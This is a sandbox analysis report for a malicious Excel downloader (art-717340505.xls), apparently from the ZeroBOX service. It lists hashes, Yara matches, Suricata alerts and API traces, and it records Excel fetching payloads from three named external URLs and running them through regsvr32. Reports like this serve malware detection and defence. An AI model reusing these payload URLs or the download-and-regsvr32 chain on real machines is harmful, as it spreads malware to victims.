Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
11.18 02:11
DOCTOR FIRM ORDER FORM...
11.18 09:11
babababa.exe
11.18 09:11
Jagtfalkenes.vbs
11.18 09:11
windows_update.dll
11.18 09:11
nicko.exe
11.18 09:11
GHO%E9%95%9C%E5%83%8F%...
11.18 09:11
stories.exe
11.17 10:11
wwbizsrvs.exe
11.15 01:11
wwbizsrvs.exe
11.15 01:11
op.exe

Latest News
11.18 05:11
Strela: A newcomer in ...
11.18 05:11
A week in security (No...
11.18 05:11
A week in security (No...
11.18 04:11
카페 어니언과 함께하는 2025 코리아브...
11.18 04:11
Singapore Oil Tycoon O...
11.18 04:11
Exploit attempts for u...
11.18 04:11
NSO Group Exploited Wh...
11.18 03:11
대한민국 전통가마 연구소 ‘태고사’ 20...
11.18 03:11
더 청담, '2024 전통문화혁신사업 수...
11.18 03:11
동방이기제작소, '2024 전통문화혁신사...

Summary | ZeroBOX

art-717340505.xls

Downloader MSOffice File

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 14, 2021, 4:09 p.m.	Oct. 14, 2021, 4:11 p.m.

Size	246.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Wed Oct 13 08:23:54 2021, Security: 0
MD5	`264088059456facc8baadf2a2ba6593a`
SHA256	`493d525e3fdb1198db4942967e148c6dd5bc1c6de4bfad557c8bf8baf9f642f1`
CRC32	`B93C0C63`
ssdeep	`6144:nKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgP9jWXcZZRBTq1BOzTwvOsPDslAvS32vI7K:y9jVzTmszTwvTDy33LvfP1OW8`
Yara	Microsoft_Office_File_Zero - Microsoft Office File Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\art-717340505.xls
2600
- regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
  2820
- regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
  3060
- regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
  2868

Name	Response	Post-Analysis Lookup
pmqdermatology.com.au	A 101.0.119.207	101.0.119.207
bostonavenue.org	A 216.172.187.35	216.172.187.35
funzy.id	A 194.233.72.245	194.233.72.245
x1.i.lencr.org	CNAME crl.root-x1.letsencrypt.org.edgekey.net CNAME e8652.dscx.akamaiedge.net A 104.74.211.103	104.74.211.103

IP Address	Status	Action
101.0.119.207	Active	Moloch
104.74.211.103	Active	Moloch
164.124.101.2	Active	Moloch
194.233.72.245	Active	Moloch
216.172.187.35	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49168 -> 216.172.187.35:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 216.172.187.35:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49176 -> 194.233.72.245:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 194.233.72.245:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 194.233.72.245:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49175 -> 194.233.72.245:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 194.233.72.245:443 -> 192.168.56.103:49176	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 194.233.72.245:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 194.233.72.245:443 -> 192.168.56.103:49176	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 194.233.72.245:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 194.233.72.245:443 -> 192.168.56.103:49175	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49177 -> 194.233.72.245:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 194.233.72.245:443 -> 192.168.56.103:49175	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49177 -> 194.233.72.245:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 194.233.72.245:443 -> 192.168.56.103:49177	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 194.233.72.245:443 -> 192.168.56.103:49177	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 216.172.187.35:443 -> 192.168.56.103:49170	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 101.0.119.207:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49172 101.0.119.207:443	C=US, O=Let's Encrypt, CN=R3	CN=pmqdermatology.com.au	2a:97:18:3e:9b:72:60:41:c7:40:31:30:3f:d1:14:c6:01:79:a0:73

Performs some HTTP requests (1 event)

request

GET http://x1.i.lencr.org/

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 14, 2021, 4:09 p.m.	process_identifier: 2600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bf98000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Oct. 14, 2021, 4:09 p.m.	process_identifier: 2600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6b122000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Oct. 14, 2021, 4:09 p.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c471000 process_handle: 0xffffffff	1	0	0

Creates a suspicious process (6 events)

cmdline	regsvr32 C:\Datop\test.test
cmdline	"C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
cmdline	"C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
cmdline	"C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
cmdline	regsvr32 C:\Datop\test1.test
cmdline	regsvr32 C:\Datop\test2.test

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 14, 2021, 4:09 p.m.	process_identifier: 2600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (3 events)

Time & API	Arguments	Status	Return	Repeated
URLDownloadToFileW Oct. 14, 2021, 4:09 p.m.	url: https://bostonavenue.org/zunSJE0UYwbJ/sunise.html stack_pivoted: 0 filepath_r: C:\Datop\test.test filepath: C:\Datop\test.test		2148270085	0
URLDownloadToFileW Oct. 14, 2021, 4:09 p.m.	url: https://pmqdermatology.com.au/0aafNmAW9/suraise.html stack_pivoted: 0 filepath_r: C:\Datop\test1.test filepath: C:\Datop\test1.test		2148270105	0
URLDownloadToFileW Oct. 14, 2021, 4:09 p.m.	url: https://funzy.id/0KICC3zxK2nT/sunraie.html stack_pivoted: 0 filepath_r: C:\Datop\test2.test filepath: C:\Datop\test2.test		2148270085	0

One or more non-whitelisted processes were created (6 events)

parent_process	excel.exe				martian_process	regsvr32 C:\Datop\test.test
parent_process	excel.exe				martian_process	"C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
parent_process	excel.exe				martian_process	"C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
parent_process	excel.exe				martian_process	"C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
parent_process	excel.exe				martian_process	regsvr32 C:\Datop\test1.test
parent_process	excel.exe				martian_process	regsvr32 C:\Datop\test2.test

Generates some ICMP traffic

The process excel.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\regsvr32.exe